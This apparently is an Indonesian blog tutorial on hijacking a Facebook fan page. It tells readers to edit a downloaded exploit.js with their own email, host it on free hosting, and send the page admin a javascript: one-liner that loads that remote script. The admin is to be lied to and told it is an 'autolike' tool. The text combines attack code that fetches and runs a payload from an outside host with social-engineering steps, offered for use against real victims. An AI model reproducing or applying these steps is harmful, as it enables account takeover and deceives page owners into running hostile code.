Hack FansPage Facebook
   
    Hack FansPage Facebook yang ini menggunakan kecerobohan admin ,dengan menggunakan metode Javascript Hack.

    Saya tidak menjamin Exploit ini masih bekerja ,karena sistim keamanan Facebook yang terus diperketat setiap harinya . xD

    Persiapkan :
1. Fanspage Exploit Download  Password: Lihat
2. Hostingan Gratis
3. Script Untuk Menjalankan Exploit
4. Email Id Facebookmu
 
    Pertama ,edit exploit.js dengan notepad. Cari bagian mail Id, lalu ganti dengan email Id kamu. Save !.Kemudian ,buat hostingan di hosting gratis ,lalu upload exploit.js.

    Pastikan upload di directory root / public_html.. http://yoursite.hostingan.com/exploit.js.Berikut script untuk menjalankan Exploit.js yg sudah diupload di hostingan.

javascript:(a = (b = document).createElement(“script”)).src = “http://sitekamu.hostingan.com/exploit.js“, b.body.appendChild(a); void(0)

    Sekarang ,kamu hanya butuh mengirimkan kode Script itu kepada Admin page agar mau menjalankan kode script itu di halaman fanspagenya .Dengan mengkopy kode script lalu dipastekan di adressbar browser. 

   "Katakan saja ini Autolike Fanspage Atau Terserah Kamu."

---------------------------------------------------------------------------------------------------------------Description: Hack FansPage Facebook Rating: 3.5 Reviewer: Unknown ItemReviewed: Hack FansPage Facebook